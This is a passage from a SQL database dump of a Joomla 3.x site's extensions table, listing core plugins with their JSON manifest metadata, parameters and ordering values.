00:00:00',0,0),(436,0,'plg_system_languagecode','plugin','languagecode','system',0,0,1,0,'{\"name\":\"plg_system_languagecode\",\"type\":\"plugin\",\"creationDate\":\"November 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LANGUAGECODE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"languagecode\"}','{\"ar-aa\":\"\",\"en-gb\":\"\"}','','',0,'0000-00-00 00:00:00',10,0),(437,0,'plg_quickicon_joomlaupdate','plugin','joomlaupdate','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_joomlaupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_QUICKICON_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomlaupdate\"}','','','',0,'0000-00-00 00:00:00',0,0),(438,0,'plg_quickicon_extensionupdate','plugin','extensionupdate','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_extensionupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_QUICKICON_EXTENSIONUPDATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"extensionupdate\"}','','','',0,'0000-00-00 00:00:00',0,0),(439,0,'plg_captcha_recaptcha','plugin','recaptcha','captcha',0,0,1,0,'{\"name\":\"plg_captcha_recaptcha\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.4.0\",\"description\":\"PLG_CAPTCHA_RECAPTCHA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"recaptcha\"}','{\"public_key\":\"\",\"private_key\":\"\",\"theme\":\"clean\"}','','',0,'0000-00-00 00:00:00',0,0),(440,0,'plg_system_highlight','plugin','highlight','system',0,1,1,0,'{\"name\":\"plg_system_highlight\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_HIGHLIGHT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"highlight\"}','','','',0,'0000-00-00 00:00:00',7,0),(441,0,'plg_content_finder','plugin','finder','content',0,0,1,0,'{\"name\":\"plg_content_finder\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_FINDER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"finder\"}','','','',0,'0000-00-00 00:00:00',0,0),(442,0,'plg_finder_categories','plugin','categories','finder',0,1,1,0,'{\"name\":\"plg_finder_categories\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"categories\"}','','','',0,'0000-00-00 00:00:00',1,0),(443,0,'plg_finder_contacts','plugin','contacts','finder',0,1,1,0,'{\"name\":\"plg_finder_contacts\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CONTACTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contacts\"}','','','',0,'0000-00-00 00:00:00',2,0),(444,0,'plg_finder_content','plugin','content','finder',0,1,1,0,'{\"name\":\"plg_finder_content\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','','','',0,'0000-00-00 00:00:00',3,0),(445,0,'plg_finder_newsfeeds','plugin','newsfeeds','finder',0,1,1,0,'{\"name\":\"plg_finder_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"newsfeeds\"}','','','',0,'0000-00-00 00:00:00',4,0),(447,0,'plg_finder_tags','plugin','tags','finder',0,1,1,0,'{\"name\":\"plg_finder_tags\",\"type\":\"plugin\",\"creationDate\":\"February 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_TAGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}','','','',0,'0000-00-00 00:00:00',0,0),(448,0,'plg_twofactorauth_totp','plugin','totp','twofactorauth',0,0,1,0,'{\"name\":\"plg_twofactorauth_totp\",\"type\":\"plugin\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"PLG_TWOFACTORAUTH_TOTP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"totp\"}','','','',0,'0000-00-00 00:00:00',0,0),(449,0,'plg_authentication_cookie','plugin','cookie','authentication',0,1,1,0,'{\"name\":\"plg_authentication_cookie\",\"type\":\"plugin\",\"creationDate\":\"July 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_AUTH_COOKIE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"cookie\"}','','','',0,'0000-00-00 00:00:00',0,0),(450,0,'plg_twofactorauth_yubikey','plugin','yubikey','twofactorauth',0,0,1,0,'{\"name\":\"plg_twofactorauth_yubikey\",\"type\":\"plugin\",\"creationDate\":\"September 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"PLG_TWOFACTORAUTH_YUBIKEY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"yubikey\"}','','','',0,'0000-00-00 00:00:00',0,0),(451,0,'plg_search_tags','plugin','tags','search',0,1,1,0,'{\"name\":\"plg_search_tags\",\"type\":\"plugin\",\"creationDate\":\"March 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_TAGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}','{\"search_limit\":\"50\",\"show_tagged_items\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(452,0,'plg_system_updatenotification','plugin','updatenotification','system',0,1,1,0,'{\"name\":\"plg_system_updatenotification\",\"type\":\"plugin\",\"creationDate\":\"May 2015\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"PLG_SYSTEM_UPDATENOTIFICATION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"updatenotification\"}','{\"lastrun\":1668973261}','','',0,'0000-00-00 00:00:00',0,0),(453,0,'plg_editors-xtd_module','plugin','module','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_module\",\"type\":\"plugin\",\"creationDate\":\"October 2015\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"PLG_MODULE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"module\"}','','','',0,'0000-00-00 00:00:00',0,0),(454,0,'plg_system_stats','plugin','stats','system',0,1,1,0,'{\"name\":\"plg_system_stats\",\"type\":\"plugin\",\"creationDate\":\"November 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"PLG_SYSTEM_STATS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"stats\"}','{\"mode\":1,\"lastrun\":1656420846,\"unique_id\":\"67e29b79898ccbf829924b216a424e0d993c5547\",\"interval\":12}','','',0,'0000-00-00 00:00:00',0,0),(455,0,'plg_installer_packageinstaller','plugin','packageinstaller','installer',0,1,1,1,'{\"name\":\"plg_installer_packageinstaller\",\"type\":\"plugin\",\"creationDate\":\"May 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.6.0\",\"description\":\"PLG_INSTALLER_PACKAGEINSTALLER_PLUGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"packageinstaller\"}','','','',0,'0000-00-00 00:00:00',1,0),(456,0,'PLG_INSTALLER_FOLDERINSTALLER','plugin','folderinstaller','installer',0,1,1,1,'{\"name\":\"PLG_INSTALLER_FOLDERINSTALLER\",\"type\":\"plugin\",\"creationDate\":\"May 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.6.0\",\"description\":\"PLG_INSTALLER_FOLDERINSTALLER_PLUGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"folderinstaller\"}','','','',0,'0000-00-00 00:00:00',2,0),(457,0,'PLG_INSTALLER_URLINSTALLER','plugin','urlinstaller','installer',0,1,1,1,'{\"name\":\"PLG_INSTALLER_URLINSTALLER\",\"type\":\"plugin\",\"creationDate\":\"May 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.6.0\",\"description\":\"PLG_INSTALLER_URLINSTALLER_PLUGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"urlinstaller\"}','','','',0,'0000-00-00 00:00:00',3,0),(458,0,'plg_quickicon_phpversioncheck','plugin','phpversioncheck','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_phpversioncheck\",\"type\":\"plugin\",\"creationDate\":\"August 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_QUICKICON_PHPVERSIONCHECK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"phpversioncheck\"}','','','',0,'0000-00-00 00:00:00',0,0),(459,0,'plg_editors-xtd_menu','plugin','menu','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_menu\",\"type\":\"plugin\",\"creationDate\":\"August 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_EDITORS-XTD_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"menu\"}','','','',0,'0000-00-00 00:00:00',0,0),(460,0,'plg_editors-xtd_contact','plugin','contact','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_contact\",\"type\":\"plugin\",\"creationDate\":\"October 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_EDITORS-XTD_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','','','',0,'0000-00-00 00:00:00',0,0),(461,0,'plg_system_fields','plugin','fields','system',0,1,1,0,'{\"name\":\"plg_system_fields\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_SYSTEM_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}','','','',0,'0000-00-00 00:00:00',0,0),(462,0,'plg_fields_calendar','plugin','calendar','fields',0,1,1,0,'{\"name\":\"plg_fields_calendar\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_CALENDAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"calendar\"}','','','',0,'0000-00-00 00:00:00',0,0),(463,0,'plg_fields_checkboxes','plugin','checkboxes','fields',0,1,1,0,'{\"name\":\"plg_fields_checkboxes\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_CHECKBOXES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"checkboxes\"}','','','',0,'0000-00-00 00:00:00',0,0),(464,0,'plg_fields_color','plugin','color','fields',0,1,1,0,'{\"name\":\"plg_fields_color\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_COLOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"color\"}','','','',0,'0000-00-00 00:00:00',0,0),(465,0,'plg_fields_editor','plugin','editor','fields',0,1,1,0,'{\"name\":\"plg_fields_editor\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_EDITOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"editor\"}','','','',0,'0000-00-00 00:00:00',0,0),(466,0,'plg_fields_imagelist','plugin','imagelist','fields',0,1,1,0,'{\"name\":\"plg_fields_imagelist\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_IMAGELIST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"imagelist\"}','','','',0,'0000-00-00 00:00:00',0,0),(467,0,'plg_fields_integer','plugin','integer','fields',0,1,1,0,'{\"name\":\"plg_fields_integer\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_INTEGER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"integer\"}','{\"multiple\":\"0\",\"first\":\"1\",\"last\":\"100\",\"step\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(468,0,'plg_fields_list','plugin','list','fields',0,1,1,0,'{\"name\":\"plg_fields_list\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_LIST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"list\"}','','','',0,'0000-00-00 00:00:00',0,0),(469,0,'plg_fields_media','plugin','media','fields',0,1,1,0,'{\"name\":\"plg_fields_media\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_MEDIA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"media\"}','','','',0,'0000-00-00 00:00:00',0,0),(470,0,'plg_fields_radio','plugin','radio','fields',0,1,1,0,'{\"name\":\"plg_fields_radio\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_RADIO_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"radio\"}','','','',0,'0000-00-00 00:00:00',0,0),(471,0,'plg_fields_sql','plugin','sql','fields',0,1,1,0,'{\"name\":\"plg_fields_sql\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_SQL_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"sql\"}','','','',0,'0000-00-00 00:00:00',0,0),(472,0,'plg_fields_text','plugin','text','fields',0,1,1,0,'{\"name\":\"plg_fields_text\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_TEXT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"text\"}','','','',0,'0000-00-00 00:00:00',0,0),(473,0,'plg_fields_textarea','plugin','textarea','fields',0,1,1,0,'{\"name\":\"plg_fields_textarea\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_TEXTAREA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"textarea\"}','','','',0,'0000-00-00 00:00:00',0,0),(474,0,'plg_fields_url','plugin','url','fields',0,1,1,0,'{\"name\":\"plg_fields_url\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_URL_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"url\"}','','','',0,'0000-00-00 00:00:00',0,0),(475,0,'plg_fields_user','plugin','user','fields',0,1,1,0,'{\"name\":\"plg_fields_user\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_USER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"user\"}','','','',0,'0000-00-00 00:00:00',0,0),(476,0,'plg_fields_usergrouplist','plugin','usergrouplist','fields',0,1,1,0,'{\"name\":\"plg_fields_usergrouplist\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_USERGROUPLIST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"usergrouplist\"}','','','',0,'0000-00-00 00:00:00',0,0),(477,0,'plg_content_fields','plugin','fields','content',0,1,1,0,'{\"name\":\"plg_content_fields\",\"type\":\"plugin\",\"creationDate\":\"February 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_CONTENT_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}','','','',0,'0000-00-00 00:00:00',0,0),(478,0,'plg_editors-xtd_fields','plugin','fields','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_fields\",\"type\":\"plugin\",\"creationDate\":\"February 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_EDITORS-XTD_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}','','','',0,'0000-00-00 00:00:00',0,0),(479,0,'plg_sampledata_blog','plugin','blog','sampledata',0,0,1,0,'{\"name\":\"plg_sampledata_blog\",\"type\":\"plugin\",\"creationDate\":\"July 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8.0\",\"description\":\"PLG_SAMPLEDATA_BLOG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"blog\"}','','','',0,'0000-00-00 00:00:00',0,0),(480,0,'plg_system_sessiongc','plugin','sessiongc','system',0,1,1,0,'{\"name\":\"plg_system_sessiongc\",\"type\":\"plugin\",\"creationDate\":\"February 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8.6\",\"description\":\"PLG_SYSTEM_SESSIONGC_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"sessiongc\"}','','','',0,'0000-00-00 00:00:00',0,0),(481,0,'plg_fields_repeatable','plugin','repeatable','fields',0,1,1,0,'{\"name\":\"plg_fields_repeatable\",\"type\":\"plugin\",\"creationDate\":\"April 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_FIELDS_REPEATABLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"repeatable\"}','','','',0,'0000-00-00 00:00:00',0,0),(482,0,'plg_content_confirmconsent','plugin','confirmconsent','content',0,0,1,0,'{\"name\":\"plg_content_confirmconsent\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_CONTENT_CONFIRMCONSENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"confirmconsent\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(483,0,'PLG_SYSTEM_ACTIONLOGS','plugin','actionlogs','system',0,0,1,0,'{\"name\":\"PLG_SYSTEM_ACTIONLOGS\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SYSTEM_ACTIONLOGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"actionlogs\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(484,0,'PLG_ACTIONLOG_JOOMLA','plugin','joomla','actionlog',0,1,1,0,'{\"name\":\"PLG_ACTIONLOG_JOOMLA\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_ACTIONLOG_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(485,0,'plg_system_privacyconsent','plugin','privacyconsent','system',0,0,1,0,'{\"name\":\"plg_system_privacyconsent\",\"type\":\"plugin\",\"creationDate\":\"April 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SYSTEM_PRIVACYCONSENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"privacyconsent\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(486,0,'plg_system_logrotation','plugin','logrotation','system',0,1,1,0,'{\"name\":\"plg_system_logrotation\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SYSTEM_LOGROTATION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"logrotation\"}','{\"lastrun\":1668301495}','','',0,'0000-00-00 00:00:00',0,0),(487,0,'plg_privacy_user','plugin','user','privacy',0,1,1,0,'{\"name\":\"plg_privacy_user\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_USER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"user\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(488,0,'plg_quickicon_privacycheck','plugin','privacycheck','quickicon',0,1,1,0,'{\"name\":\"plg_quickicon_privacycheck\",\"type\":\"plugin\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights 